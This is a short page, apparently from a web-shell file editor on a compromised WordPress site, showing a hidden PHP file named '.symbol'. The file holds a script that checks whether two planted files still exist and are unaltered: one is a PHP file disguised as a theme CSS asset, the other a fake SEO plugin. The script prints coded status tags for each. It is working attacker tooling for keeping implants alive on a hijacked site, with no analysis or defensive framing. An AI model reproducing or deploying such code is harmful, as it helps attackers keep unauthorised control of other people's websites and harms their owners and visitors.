관리-도구
편집 파일: .symbol
<?php $r = '/home/u611080084/domains/textaeg.com/public_html'; $x = ["/wp-content/themes/astra/inc/modules/related-posts/css/dynamic.css.php"=>"bd@@206864@@950", "/wp-content/plugins/seo_1784660569/inc/front-page-template-1784660569.php"=>"bd@@165286@@806"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');